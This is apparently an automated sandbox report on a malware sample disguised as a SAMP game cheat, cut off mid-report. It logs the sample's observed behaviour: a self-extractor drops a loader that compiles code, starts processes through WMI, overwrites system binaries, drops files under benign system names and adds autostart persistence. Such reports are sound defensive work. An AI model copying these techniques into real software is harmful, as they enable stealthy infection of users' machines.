                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeDirectory created: C:\Program Files\Uninstall Information\jnowHpJlZlXal.exeJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeDirectory created: C:\Program Files\Uninstall Information\7ebef5d49c4292Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeDirectory created: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeDirectory created: C:\Program Files\7-Zip\Lang\7ebef5d49c4292Jump to behavior
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic file information: File size 2324826 > 1048576
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                    Source: Binary string: ;C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.pdb source: BridgePortsurrogateserverref.exe, 0000000A.00000002.1520293640.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: ;C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.pdb source: BridgePortsurrogateserverref.exe, 0000000A.00000002.1520293640.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline"
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.cmdline"
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline"Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.cmdline"Jump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeFile created: C:\msportComWin\__tmp_rar_sfx_access_check_4208109Jump to behavior
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0F640 push ecx; ret 0_2_00D0F653
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0EB78 push eax; ret 0_2_00D0EB96
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeCode function: 10_2_00007FFAAC584B5B push edi; retf 10_2_00007FFAAC584B60
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeCode function: 10_2_00007FFAAC58535A push edi; ret 10_2_00007FFAAC585360
                                    Source: BridgePortsurrogateserverref.exe.0.drStatic PE information: section name: .text entropy: 7.571236871743646
                                    Source: services.exe.10.drStatic PE information: section name: .text entropy: 7.571236871743646
                                    Source: jnowHpJlZlXal.exe.10.drStatic PE information: section name: .text entropy: 7.571236871743646
                                    Source: jnowHpJlZlXal.exe0.10.drStatic PE information: section name: .text entropy: 7.571236871743646
                                    Source: jnowHpJlZlXal.exe1.10.drStatic PE information: section name: .text entropy: 7.571236871743646
                                    Source: jnowHpJlZlXal.exe2.10.drStatic PE information: section name: .text entropy: 7.571236871743646

                                    Persistence and Installation Behavior

                                    barindex
                                    Creates processes via WMI
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Drops PE files with benign system names
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Recovery\services.exeJump to dropped file
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Users\user\Desktop\fSPDjruA.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Recovery\jnowHpJlZlXal.exeJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Users\user\Desktop\VrgGeyQY.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Users\user\Desktop\VjwnzPpT.logJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Users\user\Desktop\MGoyPVal.logJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Users\user\Desktop\EcfIfcKE.logJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Program Files\Uninstall Information\jnowHpJlZlXal.exeJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\msportComWin\jnowHpJlZlXal.exeJump to dropped file
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeFile created: C:\msportComWin\BridgePortsurrogateserverref.exeJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Users\user\Desktop\vyXTwjuX.logJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Recovery\services.exeJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Users\user\Desktop\vyXTwjuX.logJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Users\user\Desktop\VrgGeyQY.logJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Users\user\Desktop\fSPDjruA.logJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Users\user\Desktop\VjwnzPpT.logJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Users\user\Desktop\MGoyPVal.logJump to dropped file
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Users\user\Desktop\EcfIfcKE.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Creates an undocumented autostart registry key
